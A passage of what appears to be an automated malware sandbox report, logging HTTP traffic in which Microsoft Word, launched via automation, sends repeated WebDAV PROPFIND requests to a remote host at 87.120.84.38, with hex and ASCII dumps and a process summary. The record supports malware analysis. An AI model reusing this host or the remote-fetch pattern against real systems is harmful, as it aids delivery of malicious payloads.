    Date: Mon, 21 Oct 2024 11:27:38 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 310
    Connection: keep-alive
    Location: http://87.120.84.38/txt/
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 38 37 2e 31 32 30 2e 38 34 2e 33 38 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 37 2e 31 32 30 2e 38 34 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://87.120.84.38/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:38.979826927 CEST163OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69
    Data Ascii: PROPFIND /txt/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 87.120.84.38
    Oct 21, 2024 13:27:39.277832031 CEST517INHTTP/1.1 405 Method Not Allowed
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:39 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 303
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 37 2e 31 32 30 2e 38 34 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:39.477997065 CEST162OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52
    Data Ascii: PROPFIND /txt HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 87.120.84.38
    Oct 21, 2024 13:27:39.619071007 CEST517INHTTP/1.1 405 Method Not Allowed
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:39 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 303
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 37 2e 31 32 30 2e 38 34 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:39.913047075 CEST529INHTTP/1.1 301 Moved Permanently
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:39 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 310
    Connection: keep-alive
    Location: http://87.120.84.38/txt/
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 38 37 2e 31 32 30 2e 38 34 2e 33 38 2f 74 78 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 37 2e 31 32 30 2e 38 34 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://87.120.84.38/txt/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>
    Oct 21, 2024 13:27:39.914808989 CEST163OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 74 78 74 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69
    Data Ascii: PROPFIND /txt/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 87.120.84.38
    Oct 21, 2024 13:27:40.211926937 CEST517INHTTP/1.1 405 Method Not Allowed
    Server: nginx/1.26.2
    Date: Mon, 21 Oct 2024 11:27:40 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 303
    Connection: keep-alive
    Allow: POST,OPTIONS,HEAD,GET
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 38 37 2e 31 32 30 2e 38 34 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 87.120.84.38 Port 80</address></body></html>


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Target ID:0
    Start time:07:27:29
    Start date:21/10/2024
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13f8a0000
    File size:1'423'704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    No disassembly